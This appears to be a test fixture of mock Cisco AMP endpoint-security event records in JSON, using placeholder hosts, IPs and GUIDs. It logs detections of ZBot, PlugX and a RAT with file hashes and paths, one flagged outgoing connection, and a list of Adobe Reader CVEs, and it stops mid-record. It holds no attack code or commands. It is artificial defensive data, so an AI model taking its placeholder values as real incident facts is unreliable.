+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906501425758000,"timestamp":1610704994,"timestamp_nanoseconds":771000000,"date":"2021-01-15T10:03:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906501425758211","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255369279439000,"timestamp":1610704993,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255369279438863","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906497130791000,"timestamp":1610704993,"timestamp_nanoseconds":662000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906497130790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX0\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":428,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395608001000,"timestamp":1610704992,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:03:12+00:00","event_type":"Adobe Reader compromise","event_type_id":1107296261,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704992,"start_date":"2021-01-15T10:03:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"},"parent":{"disposition":"Clean","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266559459951000,"timestamp":1610704979,"timestamp_nanoseconds":950000000,"date":"2021-01-15T10:02:59+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5832266559459950593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":25939,"local_ip":"10.10.0.0","local_port":15322,"nfm":{"direction":"Outgoing connection from","protocol":"UDP"},"parent":{"process_id":1512,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":701000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408458","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408457","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":451000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408456","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266495035441000,"timestamp":1610704964,"timestamp_nanoseconds":482000000,"date":"2021-01-15T10:02:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266495035441159","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":404000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":201000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900074000600,"timestamp":1610704962,"timestamp_nanoseconds":74000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900373000000,"timestamp":1610704962,"timestamp_nanoseconds":373000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":560000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506561","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506562","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395429000700,"timestamp":1610704954,"timestamp_nanoseconds":429000000,"date":"2021-01-15T10:02:34+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704954,"start_date":"2021-01-15T10:02:34+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"name":"Adobe Acrobat 